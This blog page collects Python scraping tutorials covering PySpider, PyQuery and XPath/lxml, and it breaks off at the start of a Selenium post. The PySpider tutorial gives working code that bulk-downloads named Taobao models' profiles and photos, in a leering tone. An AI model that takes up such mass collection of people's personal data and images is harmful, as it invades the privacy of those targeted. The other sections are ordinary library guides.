2022 年最新 Python3 网络爬虫教程

博主自荐：截止 2022 年，可以将最前沿最全面的爬虫技术都涵盖的教程，如异步、JavaScript 逆向、安卓逆向、智能解析、WebAssembly、大规模分布式、Kubernetes 等，市面上目前就这一套了。

最新教程对旧的爬虫技术内容进行了全面更新，搭建了全新的案例平台进行全面讲解，保证案例稳定有效不过期。

教程请移步：

【2022 版】Python3 网络爬虫学习教程

如下为原文。

审时度势

PySpider 是一个我个人认为非常方便并且功能强大的爬虫框架，支持多线程爬取、JS 动态解析，提供了可操作界面、出错重试、定时爬取等等的功能，使用非常人性化。本篇内容通过跟我做一个好玩的 PySpider 项目，来理解 PySpider 的运行流程。

招兵买马

具体的安装过程请查看本节讲述安装嗯，安装好了之后就与我大干一番吧。

鸿鹄之志

我之前写过的一篇文章抓取淘宝 MM 照片由于网页改版，爬取过程中需要的 URL 需要 JS 动态解析生成，所以之前用的 urllib2 不能继续使用了，在这里我们利用 PySpider 重新实现一下。所以现在我们需要做的是抓取淘宝 MM 的个人信息和图片存储到本地。

审时度势

爬取目标网站：https://mm.taobao.com/json/request_top_list.htm?page=1，大家打开之后可以看到许多淘宝 MM 的列表。列表有多少？ https://mm.taobao.com/json/request_top_list.htm?page=10000，第 10000 页都有，看你想要多少。我什么也不知道。随机点击一位 MM 的姓名，可以看到她的基本资料。可以看到图中有一个个性域名，我们复制到浏览器打开。mm.taobao.com/tyy6160 嗯，往下拖，海量的 MM 图片都在这里了，怎么办你懂得，我们要把她们的照片和个人信息都存下来。 P.S. 注意图中进度条！你猜有多少图片～

利剑出鞘

安装成功之后，跟我一步步地完成一个网站的抓取，你就会明白 PySpider 的基本用法了。命令行下执行

1	pyspider all

这句命令的意思是，运行 pyspider 并启动它的所有组件。可以发现程序已经正常启动，并在 5000 这个端口运行。

一触即发

接下来在浏览器中输入 http://localhost:5000，可以看到 PySpider 的主界面，点击右下角的 Create，命名为 taobaomm，当然名称你可以随意取，继续点击 Create。这样我们会进入到一个爬取操作的页面。整个页面分为两栏，左边是爬取页面预览区域，右边是代码编写区域。下面对区块进行说明：左侧绿色区域：这个请求对应的 JSON 变量，在 PySpider 中，其实每个请求都有与之对应的 JSON 变量，包括回调函数，方法名，请求链接，请求数据等等。绿色区域右上角 Run：点击右上角的 run 按钮，就会执行这个请求，可以在左边的白色区域出现请求的结果。左侧 enable css selector helper: 抓取页面之后，点击此按钮，可以方便地获取页面中某个元素的 CSS 选择器。左侧 web: 即抓取的页面的实时预览图。左侧 html: 抓取页面的 HTML 代码。左侧 follows: 如果当前抓取方法中又新建了爬取请求，那么接下来的请求就会出现在 follows 里。左侧 messages: 爬取过程中输出的一些信息。右侧代码区域: 你可以在右侧区域书写代码，并点击右上角的 Save 按钮保存。右侧 WebDAV Mode: 打开调试模式，左侧最大化，便于观察调试。

乘胜追击

依然是上一节的那个网址，https://mm.taobao.com/json/request_top_list.htm?page=1，其中 page 参数代表页码。所以我们暂时抓取前 30 页。页码到最后可以随意调整。首先我们定义基地址，然后定义爬取的页码和总页码。

from pyspider.libs.base_handler import *


class Handler(BaseHandler):
    crawl_config = {
    }

    def __init__(self):
        self.base_url = 'https://mm.taobao.com/json/request_top_list.htm?page='
        self.page_num = 1
        self.total_num = 30

    @every(minutes=24 * 60)
    def on_start(self):
        while self.page_num <= self.total_num:
            url = self.base_url + str(self.page_num)
            print url
            self.crawl(url, callback=self.index_page)
            self.page_num += 1

    @config(age=10 * 24 * 60 * 60)
    def index_page(self, response):
        for each in response.doc('a[href^="http"]').items():
            self.crawl(each.attr.href, callback=self.detail_page)

    @config(priority=2)
    def detail_page(self, response):
        return {
            "url": response.url,
            "title": response.doc('title').text(),
        }

点击 save 保存代码，然后点击左边的 run，运行代码。运行后我们会发现 follows 出现了 30 这个数字，说明我们接下来有 30 个新请求，点击可查看所有爬取列表。另外控制台也有输出，将所有要爬取的 URL 打印了出来。然后我们点击左侧任意一个绿色箭头，可以继续爬取这个页面。例如点击第一个 URL，来爬取这个 URL 点击之后，再查看下方的 web 页面，可以预览实时页面，这个页面被我们爬取了下来，并且回调到 index_page 函数来处理，目前 index_page 函数我们还没有处理，所以是继续构件了所有的链接请求。好，接下来我们怎么办？当然是进入到 MM 到个人页面去爬取了。

如火如荼

爬取到了 MM 的列表，接下来就要进入到 MM 详情页了，修改 index_page 方法。

1
2
3

def index_page(self, response):
    for each in response.doc('.lady-name').items():
        self.crawl(each.attr.href, callback=self.detail_page)

其中 response 就是刚才爬取的列表页，response 其实就相当于列表页的 html 代码，利用 doc 函数，其实是调用了 PyQuery，用 CSS 选择器得到每一个 MM 的链接，然后重新发起新的请求。比如，我们这里拿到的 each.attr.href 可能是 mm.taobao.com/self/model_card.htm?user_id=687471686，在这里继续调用了 crawl 方法，代表继续抓取这个链接的详情。

1	self.crawl(each.attr.href, callback=self.detail_page)

然后回调函数就是 detail_page，爬取的结果会作为 response 变量传过去。detail_page 接到这个变量继续下面的分析。好，我们继续点击 run 按钮，开始下一个页面的爬取。得到的结果是这样的。哦，有些页面没有加载出来，这是为什么？在之前的文章说过，这个页面比较特殊，右边的页面使用 JS 渲染生成的，而普通的抓取是不能得到 JS 渲染后的页面的，这可麻烦了。然而，幸运的是，PySpider 提供了动态解析 JS 的机制。友情提示：可能有的小伙伴不知道 PhantomJS，可以参考爬虫 JS 动态解析因为我们在前面装好了 PhantomJS，所以，这时候就轮到它来出场了。在最开始运行 PySpider 的时候，使用了pyspider all命令，这个命令是把 PySpider 所有的组件启动起来，其中也包括 PhantomJS。所以我们代码怎么改呢？很简单。

1
2
3

def index_page(self, response):
    for each in response.doc('.lady-name').items():
        self.crawl(each.attr.href, callback=self.detail_page, fetch_type='js')

只是简单地加了一个 fetch_type=’js’，点击绿色的返回箭头，重新运行一下。可以发现，页面已经被我们成功加载出来了，简直不能更帅！看下面的个性域名，所有我们需要的 MM 图片都在那里面了，所以我们需要继续抓取这个页面。

胜利在望

好，继续修改 detail_page 方法，然后增加一个 domain_page 方法，用来处理每个 MM 的个性域名。

def detail_page(self, response):
    domain = 'https:' + response.doc('.mm-p-domain-info li > span').text()
    print domain
    self.crawl(domain, callback=self.domain_page)

def domain_page(self, response):
    pass

好，继续重新 run，预览一下页面，终于，我们看到了 MM 的所有图片。嗯，你懂得！

只欠东风

好，照片都有了，那么我们就偷偷地下载下来吧～完善 domain_page 代码，实现保存简介和遍历保存图片的方法。在这里，PySpider 有一个特点，所有的 request 都会保存到一个队列中，并具有去重和自动重试机制。所以，我们最好的解决方法是，把每张图片的请求都写成一个 request，然后成功后用文件写入即可，这样会避免图片加载不全的问题。曾经在之前文章写过图片下载和文件夹创建的过程，在这里就不多赘述原理了，直接上写好的工具类，后面会有完整代码。

import os

class Deal:
    def __init__(self):
        self.path = DIR_PATH
        if not self.path.endswith('/'):
            self.path = self.path + '/'
        if not os.path.exists(self.path):
            os.makedirs(self.path)

    def mkDir(self, path):
        path = path.strip()
        dir_path = self.path + path
        exists = os.path.exists(dir_path)
        if not exists:
            os.makedirs(dir_path)
            return dir_path
        else:
            return dir_path

    def saveImg(self, content, path):
        f = open(path, 'wb')
        f.write(content)
        f.close()

    def saveBrief(self, content, dir_path, name):
        file_name = dir_path + "/" + name + ".txt"
        f = open(file_name, "w+")
        f.write(content.encode('utf-8'))

    def getExtension(self, url):
        extension = url.split('.')[-1]
        return extension

这里面包含了四个方法。

mkDir：创建文件夹，用来创建 MM 名字对应的文件夹。 saveBrief: 保存简介，保存 MM 的文字简介。 saveImg: 传入图片二进制流以及保存路径，存储图片。 getExtension: 获得链接的后缀名，通过图片 URL 获得。

然后在 domain_page 中具体实现如下

def domain_page(self, response):
    name = response.doc('.mm-p-model-info-left-top dd > a').text()
    dir_path = self.deal.mkDir(name)
    brief = response.doc('.mm-aixiu-content').text()
    if dir_path:
        imgs = response.doc('.mm-aixiu-content img').items()
        count = 1
        self.deal.saveBrief(brief, dir_path, name)
        for img in imgs:
            url = img.attr.src
            if url:
                extension = self.deal.getExtension(url)
                file_name = name + str(count) + '.' + extension
                count += 1
                self.crawl(img.attr.src, callback=self.save_img,
                           save={'dir_path': dir_path, 'file_name': file_name})

def save_img(self, response):
    content = response.content
    dir_path = response.save['dir_path']
    file_name = response.save['file_name']
    file_path = dir_path + '/' + file_name
    self.deal.saveImg(content, file_path)

以上方法首先获取了页面的所有文字，然后调用了 saveBrief 方法存储简介。然后遍历了 MM 所有的图片，并通过链接获取后缀名，和 MM 的姓名以及自增计数组合成一个新的文件名，调用 saveImg 方法保存图片。

炉火纯青

好，基本的东西都写好了。接下来。继续完善一下代码。第一版本完成。 版本一功能：按照淘宝 MM 姓名分文件夹，存储 MM 的 txt 文本简介以及所有美图至本地。 可配置项：

PAGE_START: 列表开始页码

PAGE_END: 列表结束页码

DIR_PATH: 资源保存路径

#!/usr/bin/env python
# -*- encoding: utf-8 -*-
# Created on 2016-03-25 00:59:45
# Project: taobaomm

from pyspider.libs.base_handler import *

PAGE_START = 1
PAGE_END = 30
DIR_PATH = '/var/py/mm'


class Handler(BaseHandler):
    crawl_config = {
    }

    def __init__(self):
        self.base_url = 'https://mm.taobao.com/json/request_top_list.htm?page='
        self.page_num = PAGE_START
        self.total_num = PAGE_END
        self.deal = Deal()

    def on_start(self):
        while self.page_num <= self.total_num:
            url = self.base_url + str(self.page_num)
            self.crawl(url, callback=self.index_page)
            self.page_num += 1

    def index_page(self, response):
        for each in response.doc('.lady-name').items():
            self.crawl(each.attr.href, callback=self.detail_page, fetch_type='js')

    def detail_page(self, response):
        domain = response.doc('.mm-p-domain-info li > span').text()
        if domain:
            page_url = 'https:' + domain
            self.crawl(page_url, callback=self.domain_page)

    def domain_page(self, response):
        name = response.doc('.mm-p-model-info-left-top dd > a').text()
        dir_path = self.deal.mkDir(name)
        brief = response.doc('.mm-aixiu-content').text()
        if dir_path:
            imgs = response.doc('.mm-aixiu-content img').items()
            count = 1
            self.deal.saveBrief(brief, dir_path, name)
            for img in imgs:
                url = img.attr.src
                if url:
                    extension = self.deal.getExtension(url)
                    file_name = name + str(count) + '.' + extension
                    count += 1
                    self.crawl(img.attr.src, callback=self.save_img,
                               save={'dir_path': dir_path, 'file_name': file_name})

    def save_img(self, response):
        content = response.content
        dir_path = response.save['dir_path']
        file_name = response.save['file_name']
        file_path = dir_path + '/' + file_name
        self.deal.saveImg(content, file_path)


import os

class Deal:
    def __init__(self):
        self.path = DIR_PATH
        if not self.path.endswith('/'):
            self.path = self.path + '/'
        if not os.path.exists(self.path):
            os.makedirs(self.path)

    def mkDir(self, path):
        path = path.strip()
        dir_path = self.path + path
        exists = os.path.exists(dir_path)
        if not exists:
            os.makedirs(dir_path)
            return dir_path
        else:
            return dir_path

    def saveImg(self, content, path):
        f = open(path, 'wb')
        f.write(content)
        f.close()

    def saveBrief(self, content, dir_path, name):
        file_name = dir_path + "/" + name + ".txt"
        f = open(file_name, "w+")
        f.write(content.encode('utf-8'))

    def getExtension(self, url):
        extension = url.split('.')[-1]
        return extension

粘贴到你的 PySpider 中运行吧～其中有一些知识点，我会在后面作详细的用法总结。大家可以先体会一下代码。保存之后，点击下方的 run，你会发现，海量的 MM 图片已经涌入你的电脑啦～需要解释？需要我也不解释！

项目代码

TaobaoMM - GitHub

尚方宝剑

如果想了解 PySpider 的更多内容，可以查看官方文档。官方文档

作者崔庆才发表于 2016-03-26 阅读次数：本文字数： 8.5k 阅读时长 ≈ 8 分钟

Python Python爬虫利器六之PyQuery的用法

2022 年最新 Python3 网络爬虫教程

博主自荐：截止 2022 年，可以将最前沿最全面的爬虫技术都涵盖的教程，如异步、JavaScript 逆向、安卓逆向、智能解析、WebAssembly、大规模分布式、Kubernetes 等，市面上目前就这一套了。

最新教程对旧的爬虫技术内容进行了全面更新，搭建了全新的案例平台进行全面讲解，保证案例稳定有效不过期。

教程请移步：

【2022 版】Python3 网络爬虫学习教程

如下为原文。

前言

你是否觉得 XPath 的用法多少有点晦涩难记呢？你是否觉得 BeautifulSoup 的语法多少有些悭吝难懂呢？你是否甚至还在苦苦研究正则表达式却因为少些了一个点而抓狂呢？你是否已经有了一些前端基础了解选择器却与另外一些奇怪的选择器语法混淆了呢？嗯，那么，前端大大们的福音来了，PyQuery 来了，乍听名字，你一定联想到了 jQuery，如果你对 jQuery 熟悉，那么 PyQuery 来解析文档就是不二之选！包括我在内！ PyQuery 是 Python 仿照 jQuery 的严格实现。语法与 jQuery 几乎完全相同，所以不用再去费心去记一些奇怪的方法了。天下竟然有这等好事？我都等不及了！

安装

有这等神器还不赶紧安装了！来！

1	pip install pyquery

还是原来的配方，还是熟悉的味道。

参考来源

本文内容参考官方文档，更多内容，大家可以去官方文档学习，毕竟那里才是最原汁原味的。目前版本 1.2.4 (2016/3/24) 官方文档

简介

pyquery allows you to make jquery queries on xml documents. The API is as much as possible the similar to jquery. pyquery uses lxml for fast xml and html manipulation. This is not (or at least not yet) a library to produce or interact with javascript code. I just liked the jquery API and I missed it in python so I told myself “Hey let’s make jquery in python”. This is the result. It can be used for many purposes, one idea that I might try in the future is to use it for templating with pure http templates that you modify using pyquery. I can also be used for web scrapping or for theming applications with Deliverance.

pyquery 可让你用 jQuery 的语法来对 xml 进行操作。这I和 jQuery 十分类似。如果利用 lxml，pyquery 对 xml 和 html 的处理将更快。这个库不是（至少还不是）一个可以和 JavaScript交互的代码库，它只是非常像 jQuery API 而已。

初始化

在这里介绍四种初始化方式。（1）直接字符串

1 2	from pyquery import PyQuery as pq doc = pq("<html></html>")

pq 参数可以直接传入 HTML 代码，doc 现在就相当于 jQuery 里面的 $ 符号了。（2）lxml.etree

1 2	from lxml import etree doc = pq(etree.fromstring("<html></html>"))

可以首先用 lxml 的 etree 处理一下代码，这样如果你的 HTML 代码出现一些不完整或者疏漏，都会自动转化为完整清晰结构的 HTML代码。（3）直接传URL

1 2	from pyquery import PyQuery as pq doc = pq('http://www.baidu.com')

这里就像直接请求了一个网页一样，类似用 urllib2 来直接请求这个链接，得到 HTML 代码。（4）传文件

1 2	from pyquery import PyQuery as pq doc = pq(filename='hello.html')

可以直接传某个路径的文件名。

快速体验

现在我们以本地文件为例，传入一个名字为 hello.html 的文件，文件内容为

<div>
    <ul>
         <li class="item-0">first item</li>
         <li class="item-1"><a href="link2.html">second item</a></li>
         <li class="item-0 active"><a href="link3.html"><span class="bold">third item</span></a></li>
         <li class="item-1 active"><a href="link4.html">fourth item</a></li>
         <li class="item-0"><a href="link5.html">fifth item</a></li>
     </ul>
 </div>

编写如下程序

from pyquery import PyQuery as pq
doc = pq(filename='hello.html')
print doc.html()
print type(doc)
li = doc('li')
print type(li)
print li.text()

运行结果

    <ul>
         <li class="item-0">first item</li>
         <li class="item-1"><a href="link2.html">second item</a></li>
         <li class="item-0 active"><a href="link3.html"><span class="bold">third item</span></a></li>
         <li class="item-1 active"><a href="link4.html">fourth item</a></li>
         <li class="item-0"><a href="link5.html">fifth item</a></li>
     </ul>
 
<class 'pyquery.pyquery.PyQuery'>
<class 'pyquery.pyquery.PyQuery'>
first item second item third item fourth item fifth item

看，回忆一下 jQuery 的语法，是不是运行结果都是一样的呢？在这里我们注意到了一点，PyQuery 初始化之后，返回类型是 PyQuery，利用了选择器筛选一次之后，返回结果的类型依然还是 PyQuery，这简直和 jQuery 如出一辙，不能更赞！然而想一下 BeautifulSoup 和 XPath 返回的是什么？列表！一种不能再进行二次筛选（在这里指依然利用 BeautifulSoup 或者 XPath 语法）的对象！然而比比 PyQuery，哦我简直太爱它了！

属性操作

你可以完全按照 jQuery 的语法来进行 PyQuery 的操作。

from pyquery import PyQuery as pq

p = pq('<p id="hello" class="hello"></p>')('p')
print p.attr("id")
print p.attr("id", "plop")
print p.attr("id", "hello")

运行结果

1
2
3

hello
<p id="plop" class="hello"/>
<p id="hello" class="hello"/>

再来一发

from pyquery import PyQuery as pq

p = pq('<p id="hello" class="hello"></p>')('p')
print p.addClass('beauty')
print p.removeClass('hello')
print p.css('font-size', '16px')
print p.css({'background-color': 'yellow'})

运行结果

<p id="hello" class="hello beauty"/>
<p id="hello" class="beauty"/>
<p id="hello" class="beauty" style="font-size: 16px"/>
<p id="hello" class="beauty" style="font-size: 16px; background-color: yellow"/>

依旧是那么优雅与自信！在这里我们发现了，这是一连串的操作，而 p 是一直在原来的结果上变化的。 因此执行上述操作之后，p 本身也发生了变化。

DOM操作

同样的原汁原味的 jQuery 语法

from pyquery import PyQuery as pq

p = pq('<p id="hello" class="hello"></p>')('p')
print p.append(' check out <a href="http://reddit.com/r/python"><span>reddit</span></a>')
print p.prepend('Oh yes!')
d = pq('<div class="wrap"><div id="test"><a href="http://cuiqingcai.com">Germy</a></div></div>')
p.prependTo(d('#test'))
print p
print d
d.empty()
print d

运行结果

<p id="hello" class="hello"> check out <a href="http://reddit.com/r/python"><span>reddit</span></a></p>
<p id="hello" class="hello">Oh yes! check out <a href="http://reddit.com/r/python"><span>reddit</span></a></p>
<p id="hello" class="hello">Oh yes! check out <a href="http://reddit.com/r/python"><span>reddit</span></a></p>
<div class="wrap"><div id="test"><p id="hello" class="hello">Oh yes! check out <a href="http://reddit.com/r/python"><span>reddit</span></a></p><a href="http://cuiqingcai.com">Germy</a></div></div>
<div class="wrap"/>

这不需要多解释了吧。 DOM 操作也是与 jQuery 如出一辙。

遍历

遍历用到 items 方法返回对象列表，或者用 lambda

from pyquery import PyQuery as pq
doc = pq(filename='hello.html')
lis = doc('li')
for li in lis.items():
    print li.html()

print lis.each(lambda e: e)

运行结果

first item
<a href="link2.html">second item</a>
<a href="link3.html"><span class="bold">third item</span></a>
<a href="link4.html">fourth item</a>
<a href="link5.html">fifth item</a>
<li class="item-0">first item</li>
 <li class="item-1"><a href="link2.html">second item</a></li>
 <li class="item-0 active"><a href="link3.html"><span class="bold">third item</span></a></li>
 <li class="item-1 active"><a href="link4.html">fourth item</a></li>
 <li class="item-0"><a href="link5.html">fifth item</a></li>

不过最常用的还是 items 方法

网页请求

PyQuery 本身还有网页请求功能，而且会把请求下来的网页代码转为 PyQuery 对象。

1
2
3

from pyquery import PyQuery as pq
print pq('http://cuiqingcai.com/', headers={'user-agent': 'pyquery'})
print pq('http://httpbin.org/post', {'foo': 'bar'}, method='post', verify=True)

感受一下，GET，POST，样样通。

Ajax

PyQuery 同样支持 Ajax 操作，带有 get 和 post 方法，不过不常用，一般我们不会用 PyQuery 来做网络请求，仅仅是用来解析。 PyQueryAjax

API

最后少不了的，API大放送。 API 原汁原味最全的API，都在里面了！如果你对 jQuery 语法不熟，强烈建议先学习下 jQuery，再回来看 PyQuery，你会感到异常亲切！

结语

用完了 PyQuery，我已经深深爱上了他！你呢？

作者崔庆才发表于 2016-03-24 阅读次数：本文字数： 6.5k 阅读时长 ≈ 6 分钟

Python Python爬虫利器三之Xpath语法与lxml库的用法

2022 年最新 Python3 网络爬虫教程

博主自荐：截止 2022 年，可以将最前沿最全面的爬虫技术都涵盖的教程，如异步、JavaScript 逆向、安卓逆向、智能解析、WebAssembly、大规模分布式、Kubernetes 等，市面上目前就这一套了。

最新教程对旧的爬虫技术内容进行了全面更新，搭建了全新的案例平台进行全面讲解，保证案例稳定有效不过期。

教程请移步：

【2022 版】Python3 网络爬虫学习教程

原文

前言

前面我们介绍了 BeautifulSoup 的用法，这个已经是非常强大的库了，不过还有一些比较流行的解析库，例如 lxml，使用的是 Xpath 语法，同样是效率比较高的解析方法。如果大家对 BeautifulSoup 使用不太习惯的话，可以尝试下 Xpath。

参考来源

lxml用法源自 lxml python 官方文档，更多内容请直接参阅官方文档，本文对其进行翻译与整理。 lxml XPath语法参考 w3school w3school

视频资源

如果你对 XPath 不熟悉的话，可以看下这个视频资源： web端功能自动化定位元素

安装

1	pip install lxml

利用 pip 安装即可

XPath语法

XPath 是一门在 XML 文档中查找信息的语言。XPath 可用来在 XML 文档中对元素和属性进行遍历。XPath 是 W3C XSLT 标准的主要元素，并且 XQuery 和 XPointer 都构建于 XPath 表达之上。

节点关系

（1）父（Parent）每个元素以及属性都有一个父。在下面的例子中，book 元素是 title、author、year 以及 price 元素的父：

<book>
  <title>Harry Potter</title>
  <author>J K. Rowling</author>
  <year>2005</year>
  <price>29.99</price>
</book>

（2）子（Children）元素节点可有零个、一个或多个子。在下面的例子中，title、author、year 以及 price 元素都是 book 元素的子：

<book>
  <title>Harry Potter</title>
  <author>J K. Rowling</author>
  <year>2005</year>
  <price>29.99</price>
</book>

（3）同胞（Sibling）拥有相同的父的节点在下面的例子中，title、author、year 以及 price 元素都是同胞：

<book>
  <title>Harry Potter</title>
  <author>J K. Rowling</author>
  <year>2005</year>
  <price>29.99</price>
</book>

（4）先辈（Ancestor）某节点的父、父的父，等等。在下面的例子中，title 元素的先辈是 book 元素和 bookstore 元素：

<bookstore>

<book>
  <title>Harry Potter</title>
  <author>J K. Rowling</author>
  <year>2005</year>
  <price>29.99</price>
</book>

</bookstore>

（5）后代（Descendant）某个节点的子，子的子，等等。在下面的例子中，bookstore 的后代是 book、title、author、year 以及 price 元素：

<bookstore>

<book>
  <title>Harry Potter</title>
  <author>J K. Rowling</author>
  <year>2005</year>
  <price>29.99</price>
</book>

</bookstore>

选取节点

XPath 使用路径表达式在 XML 文档中选取节点。节点是通过沿着路径或者 step 来选取的。

下面列出了最有用的路径表达式：

表达式

描述

nodename

选取此节点的所有子节点。

从根节点选取。

从匹配选择的当前节点选择文档中的节点，而不考虑它们的位置。

选取当前节点。

选取当前节点的父节点。

选取属性。

实例在下面的表格中，我们已列出了一些路径表达式以及表达式的结果：

路径表达式

结果

bookstore

选取 bookstore 元素的所有子节点。

/bookstore

选取根元素 bookstore。注释：假如路径起始于正斜杠( / )，则此路径始终代表到某元素的绝对路径！

bookstore/book

选取属于 bookstore 的子元素的所有 book 元素。

//book

选取所有 book 子元素，而不管它们在文档中的位置。

bookstore//book

选择属于 bookstore 元素的后代的所有 book 元素，而不管它们位于 bookstore 之下的什么位置。

//@lang

选取名为 lang 的所有属性。

谓语（Predicates）

谓语用来查找某个特定的节点或者包含某个指定的值的节点。谓语被嵌在方括号中。实例在下面的表格中，我们列出了带有谓语的一些路径表达式，以及表达式的结果：

路径表达式

结果

/bookstore/book[1]

选取属于 bookstore 子元素的第一个 book 元素。

/bookstore/book[last()]

选取属于 bookstore 子元素的最后一个 book 元素。

/bookstore/book[last()-1]

选取属于 bookstore 子元素的倒数第二个 book 元素。

/bookstore/book[position()<3]

选取最前面的两个属于 bookstore 元素的子元素的 book 元素。

//title[@lang]

选取所有拥有名为 lang 的属性的 title 元素。

//title[@lang=’eng’]

选取所有 title 元素，且这些元素拥有值为 eng 的 lang 属性。

/bookstore/book[price>35.00]

选取 bookstore 元素的所有 book 元素，且其中的 price 元素的值须大于 35.00。

/bookstore/book[price>35.00]/title

选取 bookstore 元素中的 book 元素的所有 title 元素，且其中的 price 元素的值须大于 35.00。

选取未知节点

XPath 通配符可用来选取未知的 XML 元素。

通配符

描述

匹配任何元素节点。

匹配任何属性节点。

node()

匹配任何类型的节点。

实例在下面的表格中，我们列出了一些路径表达式，以及这些表达式的结果：

路径表达式

结果

/bookstore/*

选取 bookstore 元素的所有子元素。

//*

选取文档中的所有元素。

//title[@*]

选取所有带有属性的 title 元素。

选取若干路径

通过在路径表达式中使用“|”运算符，您可以选取若干个路径。实例在下面的表格中，我们列出了一些路径表达式，以及这些表达式的结果：

路径表达式

结果

//book/title | //book/price

选取 book 元素的所有 title 和 price 元素。

//title | //price

选取文档中的所有 title 和 price 元素。

/bookstore/book/title | //price

选取属于 bookstore 元素的 book 元素的所有 title 元素，以及文档中所有的 price 元素。

XPath 运算符

下面列出了可用在 XPath 表达式中的运算符：

运算符

描述

实例

返回值

计算两个节点集

//book | //cd

返回所有拥有 book 和 cd 元素的节点集

加法

6 + 4

减法

6 - 4

乘法

6 * 4

div

除法

8 div 4

等于

price=9.80

如果 price 是 9.80，则返回 true。如果 price 是 9.90，则返回 false。

不等于

price!=9.80

如果 price 是 9.90，则返回 true。如果 price 是 9.80，则返回 false。

小于

price<9.80

如果 price 是 9.00，则返回 true。如果 price 是 9.90，则返回 false。

小于或等于

price<=9.80

如果 price 是 9.00，则返回 true。如果 price 是 9.90，则返回 false。

大于

price>9.80

如果 price 是 9.90，则返回 true。如果 price 是 9.80，则返回 false。

大于或等于

price>=9.80

如果 price 是 9.90，则返回 true。如果 price 是 9.70，则返回 false。

或

price=9.80 or price=9.70

如果 price 是 9.80，则返回 true。如果 price 是 9.50，则返回 false。

and

与

price>9.00 and price<9.90

如果 price 是 9.80，则返回 true。如果 price 是 8.50，则返回 false。

mod

计算除法的余数

5 mod 2

lxml用法

初步使用

首先我们利用它来解析 HTML 代码，先来一个小例子来感受一下它的基本用法。

from lxml import etree
text = '''
<div>
    <ul>
         <li class="item-0"><a href="link1.html">first item</a></li>
         <li class="item-1"><a href="link2.html">second item</a></li>
         <li class="item-inactive"><a href="link3.html">third item</a></li>
         <li class="item-1"><a href="link4.html">fourth item</a></li>
         <li class="item-0"><a href="link5.html">fifth item</a>
     </ul>
 </div>
'''
html = etree.HTML(text)
result = etree.tostring(html)
print(result)

首先我们使用 lxml 的 etree 库，然后利用 etree.HTML 初始化，然后我们将其打印出来。其中，这里体现了 lxml 的一个非常实用的功能就是自动修正 html 代码，大家应该注意到了，最后一个 li 标签，其实我把尾标签删掉了，是不闭合的。不过，lxml 因为继承了 libxml2 的特性，具有自动修正 HTML 代码的功能。所以输出结果是这样的

<html><body>
<div>
    <ul>
         <li class="item-0"><a href="link1.html">first item</a></li>
         <li class="item-1"><a href="link2.html">second item</a></li>
         <li class="item-inactive"><a href="link3.html">third item</a></li>
         <li class="item-1"><a href="link4.html">fourth item</a></li>
         <li class="item-0"><a href="link5.html">fifth item</a></li>
</ul>
 </div>

</body></html>

不仅补全了 li 标签，还添加了 body，html 标签。

文件读取

除了直接读取字符串，还支持从文件读取内容。比如我们新建一个文件叫做 hello.html，内容为

<div>
    <ul>
         <li class="item-0"><a href="link1.html">first item</a></li>
         <li class="item-1"><a href="link2.html">second item</a></li>
         <li class="item-inactive"><a href="link3.html"><span class="bold">third item</span></a></li>
         <li class="item-1"><a href="link4.html">fourth item</a></li>
         <li class="item-0"><a href="link5.html">fifth item</a></li>
     </ul>
 </div>

利用 parse 方法来读取文件。

from lxml import etree
html = etree.parse('hello.html')
result = etree.tostring(html, pretty_print=True)
print(result)

同样可以得到相同的结果。

XPath实例测试

依然以上一段程序为例（1）获取所有的

标签

from lxml import etree
html = etree.parse('hello.html')
print type(html)
result = html.xpath('//li')
print result
print len(result)
print type(result)
print type(result[0])

运行结果

<type 'lxml.etree._ElementTree'>
[<Element li at 0x1014e0e18>, <Element li at 0x1014e0ef0>, <Element li at 0x1014e0f38>, <Element li at 0x1014e0f80>, <Element li at 0x1014e0fc8>]
5
<type 'list'>
<type 'lxml.etree._Element'>

可见，etree.parse 的类型是 ElementTree，通过调用 xpath 以后，得到了一个列表，包含了 5 个

元素，每个元素都是 Element 类型（2）获取

标签的所有 class

1 2	result = html.xpath('//li/@class') print result

运行结果

1	['item-0', 'item-1', 'item-inactive', 'item-1', 'item-0']

（3）获取

标签下 href 为 link1.html 的标签

1 2	result = html.xpath('//li/a[@href="link1.html"]') print result

运行结果

1	[<Element a at 0x10ffaae18>]

（4）获取

标签下的所有标签注意这么写是不对的

1	result = html.xpath('//li/span')

因为 / 是用来获取子元素的，而并不是

的子元素，所以，要用双斜杠

1 2	result = html.xpath('//li//span') print result

运行结果

1	[<Element span at 0x10d698e18>]

（5）获取

标签下的所有 class，不包括

1 2	result = html.xpath('//li/a//@class') print result

运行结果

['blod']

（6）获取最后一个

的的 href

1 2	result = html.xpath('//li[last()]/a/@href') print result

运行结果

1	['link5.html']

（7）获取倒数第二个元素的内容

1 2	result = html.xpath('//li[last()-1]/a') print result[0].text

运行结果

1	fourth item

（8）获取 class 为 bold 的标签名

1 2	result = html.xpath('//*[@class="bold"]') print result[0].tag

运行结果

span

通过以上实例的练习，相信大家对 XPath 的基本用法有了基本的了解。也可以利用 text 方法来获取元素的内容。大家多加练习！

结语

XPath 是一个非常好用的解析方法，同时也作为爬虫学习的基础，在后面的 selenium 以及 scrapy 框架中都会涉及到这部分知识，希望大家可以把它的语法掌握清楚，为后面的深入研究做好铺垫。

作者崔庆才发表于 2016-03-23 阅读次数：本文字数： 7.5k 阅读时长 ≈ 7 分钟

Python Python爬虫利器五之Selenium的用法

2022 年最新 Python3 网络爬虫教程

博主自荐：截止 2022 年，可以将最前沿最全面的爬虫技术都涵盖的教程，如异步、JavaScript 逆向、安卓逆向、智能解析、WebAssembly、大规模分布式、Kubernetes 等，市面上目前就这一套了。

最新教程对旧的爬虫技术内容进行了全面更新，搭建了全新的案例平台进行全面讲解，保证案例稳定有效不过期。

教程请移步：

【2022 版】Python3 网络爬虫学习教程

如下为原文。

前言

在上一节我们学习了 PhantomJS 的基本用法，归根结底它是一个没有界面的浏览器，而且运行的是 JavaScript 脚本，然而这就能写爬虫了吗？这又和Python有什么关系？说好的Python爬虫呢？库都学完了你给我看这个？客官别急，接下来我们介绍的这个工具，统统解决掉你的疑惑。

简介

